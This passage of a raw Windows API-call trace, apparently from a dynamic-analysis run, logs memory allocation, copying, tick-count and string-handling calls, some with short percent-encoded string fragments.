_Dst=0x24adf9bbfb8, _Src=0x24adf9ba1ac, _Size=0x4 | out: _Dst=0x24adf9bbfb8) returned 0x24adf9bbfb8 [0101.691] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.692] free (_Block=0x24ae13c72f0) [0101.692] free (_Block=0x24ae13c7560) [0101.692] free (_Block=0x24ae13c7590) [0101.692] free (_Block=0x24ae13c7620) [0101.692] free (_Block=0x24ae13c72c0) [0101.692] free (_Block=0x24ae13c7350) [0101.693] free (_Block=0x24ae139bdb0) [0101.693] free (_Block=0x24ae139ba80) [0101.693] free (_Block=0x24ae139b870) [0101.694] free (_Block=0x24ae139bf30) [0101.694] free (_Block=0x24ae139b900) [0101.694] free (_Block=0x24ae139bc90) [0101.694] free (_Block=0x24ae139bed0) [0101.694] free (_Block=0x24ae139b960) [0101.695] free (_Block=0x24ae139bde0) [0101.695] free (_Block=0x24ae139bc60) [0101.695] free (_Block=0x24ae139be40) [0101.695] free (_Block=0x24ae139bd50) [0101.695] free (_Block=0x24ae139bc30) [0101.695] free (_Block=0x24ae139bf90) [0101.695] free (_Block=0x24ae148c470) [0101.696] free (_Block=0x24ae148c2f0) [0101.696] free (_Block=0x24ae148c140) [0101.696] free (_Block=0x24ae148c440) [0101.696] free (_Block=0x24ae148c2c0) [0101.696] free (_Block=0x24ae148c410) [0101.696] free (_Block=0x24ae148c380) [0101.697] free (_Block=0x24ae148c0e0) [0101.697] free (_Block=0x24ae148c0b0) [0101.697] free (_Block=0x24ae148c020) [0101.697] free (_Block=0x24ae148c350) [0101.697] free (_Block=0x24ae148be10) [0101.697] free (_Block=0x24ae148c290) [0101.697] free (_Block=0x24ae148bff0) [0101.698] free (_Block=0x24ae148bfc0) [0101.698] free (_Block=0x24ae148be70) [0101.699] free (_Block=0x24ae148bf90) [0101.700] free (_Block=0x24ae148c260) [0101.701] free (_Block=0x24ae148bd80) [0101.701] free (_Block=0x24ae148be40) [0101.702] free (_Block=0x24ae148bf30) [0101.703] free (_Block=0x24ae148bde0) [0101.704] free (_Block=0x24ae148c3e0) [0101.705] free (_Block=0x24ae148c4a0) [0101.706] free (_Block=0x24ae148c200) [0101.707] free (_Block=0x24ae148bea0) [0101.708] free (_Block=0x24ae148bed0) [0101.709] free (_Block=0x24ae148bdb0) [0101.710] free (_Block=0x24ae148bf60) [0101.711] free (_Block=0x24ae148c080) [0101.711] free (_Block=0x24ae148c1d0) [0101.712] free (_Block=0x24ae148c050) [0101.712] free (_Block=0x24ae148c1a0) [0101.713] free (_Block=0x24ae148c170) [0101.714] free (_Block=0x24ae148bd50) [0101.714] free (_Block=0x24ae148bf00) [0101.716] free (_Block=0x24ae148bd20) [0101.716] free (_Block=0x24ae148c3b0) [0101.717] free (_Block=0x24ae148c110) [0101.718] free (_Block=0x24ae148c320) [0101.719] free (_Block=0x24ae148c230) [0101.720] free (_Block=0x24ae139da90) [0101.720] free (_Block=0x24ae139da60) [0101.721] free (_Block=0x24ae139da30) [0101.721] free (_Block=0x24ae139d9d0) [0101.722] free (_Block=0x24ae139de50) [0101.722] free (_Block=0x24ae139da00) [0101.723] free (_Block=0x24ae139de20) [0101.724] free (_Block=0x24ae139dd60) [0101.724] free (_Block=0x24ae139db50) [0101.725] free (_Block=0x24ae139dfa0) [0101.725] free (_Block=0x24ae139dd30) [0101.726] free (_Block=0x24ae139dd00) [0101.726] free (_Block=0x24ae139d9a0) [0101.727] free (_Block=0x24ae139df70) [0101.727] free (_Block=0x24ae139db20) [0101.728] free (_Block=0x24ae139dbb0) [0101.729] free (_Block=0x24ae139df40) [0101.729] free (_Block=0x24ae139daf0) [0101.730] free (_Block=0x24ae139df10) [0101.730] free (_Block=0x24ae139d970) [0101.731] free (_Block=0x24ae139ddc0) [0101.732] free (_Block=0x24ae139deb0) [0101.733] free (_Block=0x24ae139dca0) [0101.733] free (_Block=0x24ae139dee0) [0101.734] free (_Block=0x24ae139dc70) [0101.734] free (_Block=0x24ae139dc40) [0101.735] free (_Block=0x24ae139dac0) [0101.736] free (_Block=0x24ae139db80) [0101.737] free (_Block=0x24ae139dcd0) [0101.741] MulDiv (nNumber=1005, nNumerator=100, nDenominator=2139) returned 47 [0101.741] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.741] GetTickCount () returned 0x210d6c0 [0101.741] malloc (_Size=0x28) returned 0x24ae139b960 [0101.742] free (_Block=0x24ae139b960) [0101.742] memcpy (in: _Dst=0x24adf9bb8b8, _Src=0x24adf9ba11c, _Size=0x4 | out: _Dst=0x24adf9bb8b8) returned 0x24adf9bb8b8 [0101.742] malloc (_Size=0x28) returned 0x24ae139b9c0 [0101.742] malloc (_Size=0x28) returned 0x24ae139bb40 [0101.743] free (_Block=0x24ae139bb40) [0101.743] SysStringLen (param_1="%c2%aa%c3%96%14%c3%93") returned 0x15 [0101.743] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484e00 [0101.743] free (_Block=0x24ae1484e00) [0101.743] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ª", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.743] memcpy (in: _Dst=0x24adf9b8708, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b8708) returned 0x24adf9b8708 [0101.743] malloc (_Size=0x28) returned 0x24ae139bcf0 [0101.744] free (_Block=0x24ae139bcf0) [0101.744] malloc (_Size=0x28) returned 0x24ae139bba0 [0101.745] malloc (_Size=0x28) returned 0x24ae139bf30 [0101.745] malloc (_Size=0x28) returned 0x24ae139bc30 [0101.746] free (_Block=0x24ae139bc30) [0101.746] malloc (_Size=0x28) returned 0x24ae139bf90 [0101.746] free (_Block=0x24ae139bf90) [0101.747] memcpy (in: _Dst=0x24adf9ba6b8, _Src=0x24adf9ba29c, _Size=0x4 | out: _Dst=0x24adf9ba6b8) returned 0x24adf9ba6b8 [0101.747] malloc (_Size=0x28) returned 0x24ae139b870 [0101.747] malloc (_Size=0x28) returned 0x24ae139be40 [0101.747] free (_Block=0x24ae139be40) [0101.748] memcpy (in: _Dst=0x24adf9ba5b8, _Src=0x24adf9b9d8c, _Size=0x4 | out: _Dst=0x24adf9ba5b8) returned 0x24adf9ba5b8 [0101.748] malloc (_Size=0x28) returned 0x24ae139bb40 [0101.748] malloc (_Size=0x28) returned 0x24ae139b8d0 [0101.748] GetTickCount () returned 0x210d6c0 [0101.748] malloc (_Size=0x28) returned 0x24ae139bf90 [0101.749] free (_Block=0x24ae139bf90) [0101.749] memcpy (in: _Dst=0x24adf9bac18, _Src=0x24adf9b9e4c, _Size=0x4 | out: _Dst=0x24adf9bac18) returned 0x24adf9bac18 [0101.749] malloc (_Size=0x28) returned 0x24ae139b900 [0101.749] malloc (_Size=0x28) returned 0x24ae139bbd0 [0101.749] malloc (_Size=0x28) returned 0x24ae139b960 [0101.750] free (_Block=0x24ae139b960) [0101.750] memcpy (in: _Dst=0x24adf9ba7f8, _Src=0x24adf9ba08c, _Size=0x4 | out: _Dst=0x24adf9ba7f8) returned 0x24adf9ba7f8 [0101.750] malloc (_Size=0x28) returned 0x24ae139bb70 [0101.750] malloc (_Size=0x28) returned 0x24ae139bae0 [0101.751] free (_Block=0x24ae139bae0) [0101.751] SysStringLen (param_1="%69%6e%65%64") returned 0xc [0101.751] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484780 [0101.751] free (_Block=0x24ae1484780) [0101.751] memcpy (in: _Dst=0x24adf9ba5d8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9ba5d8) returned 0x24adf9ba5d8 [0101.751] malloc (_Size=0x28) returned 0x24ae139bab0 [0101.751] free (_Block=0x24ae139bab0) [0101.751] malloc (_Size=0x70) returned 0x24ae146fca0 [0101.752] malloc (_Size=0x28) returned 0x24ae139bed0 [0101.752] malloc (_Size=0x28) returned 0x24ae139bc00 [0101.752] free (_Block=0x24ae139bc00) [0101.752] malloc (_Size=0x28) returned 0x24ae139ba80 [0101.753] free (_Block=0x24ae139ba80) [0101.753] memcpy (in: _Dst=0x24adf9ba4d8, _Src=0x24adf9b9f3c, _Size=0x4 | out: _Dst=0x24adf9ba4d8) returned 0x24adf9ba4d8 [0101.753] malloc (_Size=0x28) returned 0x24ae139bb10 [0101.753] malloc (_Size=0x28) returned 0x24ae139bf90 [0101.754] free (_Block=0x24ae139bf90) [0101.754] memcpy (in: _Dst=0x24adf9ba958, _Src=0x24adf9ba23c, _Size=0x4 | out: _Dst=0x24adf9ba958) returned 0x24adf9ba958 [0101.754] malloc (_Size=0x28) returned 0x24ae139bd50 [0101.754] malloc (_Size=0x28) returned 0x24ae139bf90 [0101.754] malloc (_Size=0x28) returned 0x24ae139ba80 [0101.754] free (_Block=0x24ae139ba80) [0101.754] memcpy (in: _Dst=0x24adf9ba4f8, _Src=0x24adf9b9f6c, _Size=0x4 | out: _Dst=0x24adf9ba4f8) returned 0x24adf9ba4f8 [0101.755] malloc (_Size=0x28) returned 0x24ae139bf00 [0101.755] malloc (_Size=0x28) returned 0x24ae139b9f0 [0101.755] free (_Block=0x24ae139b9f0) [0101.755] SysStringLen (param_1="%62%61%72") returned 0x9 [0101.755] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484ac0 [0101.756] free (_Block=0x24ae1484ac0) [0101.756] malloc (_Size=0x2e0) returned 0x24ae1391270 [0101.756] malloc (_Size=0x20) returned 0x24ae139b960 [0101.756] malloc (_Size=0x288) returned 0x24ae148e790 [0101.756] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139ca60 [0101.756] GetTickCount () returned 0x210d6d0 [0101.756] realloc (_Block=0x24ae139b960, _Size=0x40) returned 0x24ae1480aa0 [0101.756] realloc (_Block=0x24ae139ca60, _Size=0x280) returned 0x24ae148d080 [0101.756] GetTickCount () returned 0x210d6d0 [0101.756] malloc (_Size=0x508) returned 0x24ae1486a00 [0101.756] realloc (_Block=0x24ae1480aa0, _Size=0x80) returned 0x24ae1482a80 [0101.756] GetTickCount () returned 0x210d6d0 [0101.756] realloc (_Block=0x24ae148d080, _Size=0x500) returned 0x24ae1489280 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] malloc (_Size=0xa08) returned 0x24ae13b2990 [0101.757] realloc (_Block=0x24ae1482a80, _Size=0x100) returned 0x24ae14739a0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] realloc (_Block=0x24ae1489280, _Size=0xa00) returned 0x24ae13b47c0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] GetTickCount () returned 0x210d6d0 [0101.757] malloc (_Size=0x1408) returned 0x24ae1489a90 [0101.758] realloc (_Block=0x24ae14739a0, _Size=0x200) returned 0x24ae13b8f80 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] realloc (_Block=0x24ae13b47c0, _Size=0x1400) returned 0x24ae1483320 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.758] GetTickCount () returned 0x210d6d0 [0101.759] GetTickCount () returned 0x210d6d0 [0101.759] GetTickCount () returned 0x210d6d0 [0101.759] malloc (_Size=0x2808) returned 0x24ae13967c0 [0101.760] GetTickCount () returned 0x210d6d0 [0101.762] GetTickCount () returned 0x210d6d0 [0101.764] GetTickCount () returned 0x210d6d0 [0101.766] GetTickCount () returned 0x210d6d0 [0101.768] GetTickCount () returned 0x210d6d0 [0101.783] GetTickCount () returned 0x210d6df [0101.785] GetTickCount () returned 0x210d6ef [0101.788] GetTickCount () returned 0x210d6ef [0101.790] GetTickCount () returned 0x210d6ef [0101.792] GetTickCount () returned 0x210d6ef [0101.794] GetTickCount () returned 0x210d6ef [0101.797] GetTickCount () returned 0x210d6ef [0101.798] malloc (_Size=0x28) returned 0x24ae139ba20 [0101.799] malloc (_Size=0x28) returned 0x24ae139b960 [0101.799] memcpy (in: _Dst=0x24adf9ba99c, _Src=0x24adf9ba638, _Size=0x2 | out: _Dst=0x24adf9ba99c) returned 0x24adf9ba99c [0101.799] memcpy (in: _Dst=0x24adf9ba99a, _Src=0x24adf9ba838, _Size=0x2 | out: _Dst=0x24adf9ba99a) returned 0x24adf9ba99a [0101.799] memcpy (in: _Dst=0x24adf9ba998, _Src=0x24adf9ba818, _Size=0x2 | out: _Dst=0x24adf9ba998) returned 0x24adf9ba998 [0101.800] free (_Block=0x24ae139b960) [0101.800] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="»", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.801] memcpy (in: _Dst=0x24adf9bab78, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bab78) returned 0x24adf9bab78 [0101.801] malloc (_Size=0x28) returned 0x24ae139bc00 [0101.801] memcpy (in: _Dst=0x24adf9acede, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9acede) returned 0x24adf9acede [0101.801] memcpy (in: _Dst=0x24adf9aced8, _Src=0x24adf9bab78, _Size=0x6 | out: _Dst=0x24adf9aced8) returned 0x24adf9aced8 [0101.802] free (_Block=0x24ae139bc00) [0101.802] malloc (_Size=0x28) returned 0x24ae139b960 [0101.803] malloc (_Size=0x28) returned 0x24ae139b9f0 [0101.803] malloc (_Size=0x28) returned 0x24ae139ba50 [0101.803] malloc (_Size=0x28) returned 0x24ae139be40 [0101.804] malloc (_Size=0x28) returned 0x24ae139ba80 [0101.804] memcpy (in: _Dst=0x24adf9b9c42, _Src=0x24adf9baaf8, _Size=0x2 | out: _Dst=0x24adf9b9c42) returned 0x24adf9b9c42 [0101.804] memcpy (in: _Dst=0x24adf9b9c40, _Src=0x24adf9ba918, _Size=0x2 | out: _Dst=0x24adf9b9c40) returned 0x24adf9b9c40 [0101.804] memcpy (in: _Dst=0x24adf9b9c3e, _Src=0x24adf9ba7b8, _Size=0x2 | out: _Dst=0x24adf9b9c3e) returned 0x24adf9b9c3e [0101.804] memcpy (in: _Dst=0x24adf9b9c3c, _Src=0x24adf9ba738, _Size=0x2 | out: _Dst=0x24adf9b9c3c) returned 0x24adf9b9c3c [0101.804] memcpy (in: _Dst=0x24adf9b9c3a, _Src=0x24adf9baa38, _Size=0x2 | out: _Dst=0x24adf9b9c3a) returned 0x24adf9b9c3a [0101.804] memcpy (in: _Dst=0x24adf9b9c38, _Src=0x24adf9ba9d8, _Size=0x2 | out: _Dst=0x24adf9b9c38) returned 0x24adf9b9c38 [0101.805] free (_Block=0x24ae139ba80) [0101.805] memcpy (in: _Dst=0x24adf9bab38, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bab38) returned 0x24adf9bab38 [0101.805] malloc (_Size=0x28) returned 0x24ae139ba80 [0101.805] memcpy (in: _Dst=0x24adf9b9c6c, _Src=0x24adf9bab38, _Size=0x4 | out: _Dst=0x24adf9b9c6c) returned 0x24adf9b9c6c [0101.805] memcpy (in: _Dst=0x24adf9b9c68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c68) returned 0x24adf9b9c68 [0101.806] free (_Block=0x24ae139ba80) [0101.806] memcpy (in: _Dst=0x24adf9ba698, _Src=0x24adf9b9c6c, _Size=0x4 | out: _Dst=0x24adf9ba698) returned 0x24adf9ba698 [0101.806] malloc (_Size=0x28) returned 0x24ae139bdb0 [0101.806] memcpy (in: _Dst=0x24adf9ba7d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba7d8) returned 0x24adf9ba7d8 [0101.806] malloc (_Size=0x28) returned 0x24ae139bd80 [0101.806] memcpy (in: _Dst=0x24adf9be54c, _Src=0x24adf9ba7d8, _Size=0x4 | out: _Dst=0x24adf9be54c) returned 0x24adf9be54c [0101.806] memcpy (in: _Dst=0x24adf9be548, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be548) returned 0x24adf9be548 [0101.807] free (_Block=0x24ae139bd80) [0101.808] memcpy (in: _Dst=0x24adf9bab18, _Src=0x24adf9be54c, _Size=0x4 | out: _Dst=0x24adf9bab18) returned 0x24adf9bab18 [0101.808] malloc (_Size=0x28) returned 0x24ae139ba80 [0101.808] malloc (_Size=0x28) returned 0x24ae139bc00 [0101.808] memcpy (in: _Dst=0x24adf9babd8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9babd8) returned 0x24adf9babd8 [0101.808] malloc (_Size=0x28) returned 0x24ae139bc30 [0101.809] memcpy (in: _Dst=0x24adf9be8ac, _Src=0x24adf9babd8, _Size=0x4 | out: _Dst=0x24adf9be8ac) returned 0x24adf9be8ac [0101.809] memcpy (in: _Dst=0x24adf9be8a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be8a8) returned 0x24adf9be8a8 [0101.809] free (_Block=0x24ae139bc30) [0101.810] memcpy (in: _Dst=0x24adf9ba478, _Src=0x24adf9be8ac, _Size=0x4 | out: _Dst=0x24adf9ba478) returned 0x24adf9ba478 [0101.810] malloc (_Size=0x28) returned 0x24ae139bc30 [0101.810] malloc (_Size=0x28) returned 0x24ae139bcf0 [0101.810] memcpy (in: _Dst=0x24adf9ba518, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba518) returned 0x24adf9ba518 [0101.810] malloc (_Size=0x28) returned 0x24ae139bab0 [0101.810] memcpy (in: _Dst=0x24adf9be57c, _Src=0x24adf9ba518, _Size=0x4 | out: _Dst=0x24adf9be57c) returned 0x24adf9be57c [0101.811] memcpy (in: _Dst=0x24adf9be578, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be578) returned 0x24adf9be578 [0101.811] free (_Block=0x24ae139bab0) [0101.812] memcpy (in: _Dst=0x24adf9ba858, _Src=0x24adf9be57c, _Size=0x4 | out: _Dst=0x24adf9ba858) returned 0x24adf9ba858 [0101.812] malloc (_Size=0x28) returned 0x24ae139bc60 [0101.812] malloc (_Size=0x28) returned 0x24ae139bc90 [0101.812] memcpy (in: _Dst=0x24adf9ba538, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba538) returned 0x24adf9ba538 [0101.812] malloc (_Size=0x28) returned 0x24ae139bab0 [0101.813] memcpy (in: _Dst=0x24adf9be7ec, _Src=0x24adf9ba538, _Size=0x4 | out: _Dst=0x24adf9be7ec) returned 0x24adf9be7ec [0101.813] memcpy (in: _Dst=0x24adf9be7e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be7e8) returned 0x24adf9be7e8 [0101.813] free (_Block=0x24ae139bab0) [0101.814] memcpy (in: _Dst=0x24adf9ba578, _Src=0x24adf9be7ec, _Size=0x4 | out: _Dst=0x24adf9ba578) returned 0x24adf9ba578 [0101.814] malloc (_Size=0x28) returned 0x24ae139bab0 [0101.814] malloc (_Size=0x28) returned 0x24ae139bd80 [0101.814] memcpy (in: _Dst=0x24adf9ba878, _Src=0xd6788fa660, _Size=0x2 | out: _Dst=0x24adf9ba878) returned 0x24adf9ba878 [0101.814] malloc (_Size=0x28) returned 0x24ae139bae0 [0101.815] memcpy (in: _Dst=0x24adf9ba89c, _Src=0x24adf9ba878, _Size=0x2 | out: _Dst=0x24adf9ba89c) returned 0x24adf9ba89c [0101.815] memcpy (in: _Dst=0x24adf9ba898, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba898) returned 0x24adf9ba898 [0101.817] free (_Block=0x24ae139bae0) [0101.817] memcpy (in: _Dst=0x24adf9bb238, _Src=0x24adf9ba89a, _Size=0x4 | out: _Dst=0x24adf9bb238) returned 0x24adf9bb238 [0101.817] malloc (_Size=0x28) returned 0x24ae139bae0 [0101.817] malloc (_Size=0x28) returned 0x24ae139bde0 [0101.817] memcpy (in: _Dst=0x24adf9ac958, _Src=0x24adf9bb238, _Size=0x4 | out: _Dst=0x24adf9ac958) returned 0x24adf9ac958 [0101.817] memcpy (in: _Dst=0x24adf9ac956, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac956) returned 0x24adf9ac956 [0101.817] memcpy (in: _Dst=0x24adf9ac952, _Src=0x24adf9ba578, _Size=0x4 | out: _Dst=0x24adf9ac952) returned 0x24adf9ac952 [0101.817] memcpy (in: _Dst=0x24adf9ac950, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac950) returned 0x24adf9ac950 [0101.817] memcpy (in: _Dst=0x24adf9ac94c, _Src=0x24adf9ba858, _Size=0x4 | out: _Dst=0x24adf9ac94c) returned 0x24adf9ac94c [0101.818] memcpy (in: _Dst=0x24adf9ac94a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac94a) returned 0x24adf9ac94a [0101.818] memcpy (in: _Dst=0x24adf9ac946, _Src=0x24adf9ba478, _Size=0x4 | out: _Dst=0x24adf9ac946) returned 0x24adf9ac946 [0101.818] memcpy (in: _Dst=0x24adf9ac944, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac944) returned 0x24adf9ac944 [0101.818] memcpy (in: _Dst=0x24adf9ac940, _Src=0x24adf9bab18, _Size=0x4 | out: _Dst=0x24adf9ac940) returned 0x24adf9ac940 [0101.818] memcpy (in: _Dst=0x24adf9ac93e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac93e) returned 0x24adf9ac93e [0101.818] memcpy (in: _Dst=0x24adf9ac93a, _Src=0x24adf9ba698, _Size=0x4 | out: _Dst=0x24adf9ac93a) returned 0x24adf9ac93a [0101.818] memcpy (in: _Dst=0x24adf9ac938, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac938) returned 0x24adf9ac938 [0101.819] free (_Block=0x24ae139bde0) [0101.819] SysStringLen (param_1="%c3%af%33%c3%ad%00") returned 0x12 [0101.819] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484c60 [0101.819] memcpy (in: _Dst=0x24adf9bed58, _Src=0x24ae1484c60, _Size=0x8 | out: _Dst=0x24adf9bed58) returned 0x24adf9bed58 [0101.819] free (_Block=0x24ae1484c60) [0101.819] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.820] memcpy (in: _Dst=0x24adf9bb0d8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bb0d8) returned 0x24adf9bb0d8 [0101.820] malloc (_Size=0x28) returned 0x24ae139bde0 [0101.820] GetTickCount () returned 0x210d70e [0101.820] memcpy (in: _Dst=0x24adf9a622e, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9a622e) returned 0x24adf9a622e [0101.820] memcpy (in: _Dst=0x24adf9a6228, _Src=0x24adf9bb0d8, _Size=0x6 | out: _Dst=0x24adf9a6228) returned 0x24adf9a6228 [0101.821] free (_Block=0x24ae139bde0) [0101.821] malloc (_Size=0x28) returned 0x24ae139bde0 [0101.822] malloc (_Size=0x28) returned 0x24ae1394c70 [0101.822] memcpy (in: _Dst=0x24adf9baddc, _Src=0x24adf9bb338, _Size=0x2 | out: _Dst=0x24adf9baddc) returned 0x24adf9baddc [0101.822] memcpy (in: _Dst=0x24adf9badda, _Src=0x24adf9baf98, _Size=0x2 | out: _Dst=0x24adf9badda) returned 0x24adf9badda [0101.822] memcpy (in: _Dst=0x24adf9badd8, _Src=0x24adf9bb2b8, _Size=0x2 | out: _Dst=0x24adf9badd8) returned 0x24adf9badd8 [0101.823] free (_Block=0x24ae1394c70) [0101.823] memcpy (in: _Dst=0x24adf9baeb8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9baeb8) returned 0x24adf9baeb8 [0101.823] malloc (_Size=0x28) returned 0x24ae1394b80 [0101.823] memcpy (in: _Dst=0x24adf9be8dc, _Src=0x24adf9baeb8, _Size=0x4 | out: _Dst=0x24adf9be8dc) returned 0x24adf9be8dc [0101.823] memcpy (in: _Dst=0x24adf9be8d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be8d8) returned 0x24adf9be8d8 [0101.824] free (_Block=0x24ae1394b80) [0101.824] memcpy (in: _Dst=0x24adf9bb038, _Src=0x24adf9be8dc, _Size=0x4 | out: _Dst=0x24adf9bb038) returned 0x24adf9bb038 [0101.824] malloc (_Size=0x28) returned 0x24ae1394790 [0101.824] memcpy (in: _Dst=0x24adf9baf18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9baf18) returned 0x24adf9baf18 [0101.824] malloc (_Size=0x28) returned 0x24ae1394850 [0101.825] memcpy (in: _Dst=0x24adf9bee1c, _Src=0x24adf9baf18, _Size=0x4 | out: _Dst=0x24adf9bee1c) returned 0x24adf9bee1c [0101.825] memcpy (in: _Dst=0x24adf9bee18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bee18) returned 0x24adf9bee18 [0101.825] free (_Block=0x24ae1394850) [0101.825] memcpy (in: _Dst=0x24adf9bb2d8, _Src=0x24adf9bee1c, _Size=0x4 | out: _Dst=0x24adf9bb2d8) returned 0x24adf9bb2d8 [0101.825] malloc (_Size=0x28) returned 0x24ae1394d30 [0101.825] malloc (_Size=0x28) returned 0x24ae1394910 [0101.826] memcpy (in: _Dst=0x24adf9bac58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bac58) returned 0x24adf9bac58 [0101.826] malloc (_Size=0x28) returned 0x24ae1394970 [0101.826] memcpy (in: _Dst=0x24adf9beaec, _Src=0x24adf9bac58, _Size=0x4 | out: _Dst=0x24adf9beaec) returned 0x24adf9beaec [0101.826] memcpy (in: _Dst=0x24adf9beae8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9beae8) returned 0x24adf9beae8 [0101.826] free (_Block=0x24ae1394970) [0101.826] memcpy (in: _Dst=0x24adf9baed8, _Src=0x24adf9beaec, _Size=0x4 | out: _Dst=0x24adf9baed8) returned 0x24adf9baed8 [0101.826] malloc (_Size=0x28) returned 0x24ae13946d0 [0101.827] malloc (_Size=0x28) returned 0x24ae1394d00 [0101.827] GetTickCount () returned 0x210d70e [0101.827] memcpy (in: _Dst=0x24adf9bea66, _Src=0x24adf9baed8, _Size=0x4 | out: _Dst=0x24adf9bea66) returned 0x24adf9bea66 [0101.827] memcpy (in: _Dst=0x24adf9bea64, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9bea64) returned 0x24adf9bea64 [0101.827] memcpy (in: _Dst=0x24adf9bea60, _Src=0x24adf9bb2d8, _Size=0x4 | out: _Dst=0x24adf9bea60) returned 0x24adf9bea60 [0101.827] memcpy (in: _Dst=0x24adf9bea5e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9bea5e) returned 0x24adf9bea5e [0101.827] memcpy (in: _Dst=0x24adf9bea5a, _Src=0x24adf9bb038, _Size=0x4 | out: _Dst=0x24adf9bea5a) returned 0x24adf9bea5a [0101.827] memcpy (in: _Dst=0x24adf9bea58, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9bea58) returned 0x24adf9bea58 [0101.828] free (_Block=0x24ae1394d00) [0101.828] SysStringLen (param_1="%6e%74%73") returned 0x9 [0101.828] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484e00 [0101.828] memcpy (in: _Dst=0x24adf9bb078, _Src=0x24ae1484e00, _Size=0x6 | out: _Dst=0x24adf9bb078) returned 0x24adf9bb078 [0101.828] free (_Block=0x24ae1484e00) [0101.828] memcpy (in: _Dst=0x24adf9bb298, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bb298) returned 0x24adf9bb298 [0101.828] malloc (_Size=0x28) returned 0x24ae1394d00 [0101.828] memcpy (in: _Dst=0x24adf9a5d2e, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9a5d2e) returned 0x24adf9a5d2e [0101.828] memcpy (in: _Dst=0x24adf9a5d28, _Src=0x24adf9bb298, _Size=0x6 | out: _Dst=0x24adf9a5d28) returned 0x24adf9a5d28 [0101.829] free (_Block=0x24ae1394d00) [0101.829] malloc (_Size=0x70) returned 0x24ae146f820 [0101.830] malloc (_Size=0x28) returned 0x24ae1394a90 [0101.830] GetTickCount () returned 0x210d70e [0101.830] malloc (_Size=0x28) returned 0x24ae13947f0 [0101.831] malloc (_Size=0x28) returned 0x24ae13948e0 [0101.832] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.832] malloc (_Size=0x28) returned 0x24ae1394940 [0101.832] malloc (_Size=0x28) returned 0x24ae13949d0 [0101.833] memcpy (in: _Dst=0x24adf9be794, _Src=0x24adf9bb158, _Size=0x2 | out: _Dst=0x24adf9be794) returned 0x24adf9be794 [0101.833] memcpy (in: _Dst=0x24adf9be792, _Src=0x24adf9bb398, _Size=0x2 | out: _Dst=0x24adf9be792) returned 0x24adf9be792 [0101.833] memcpy (in: _Dst=0x24adf9be790, _Src=0x24adf9bac98, _Size=0x2 | out: 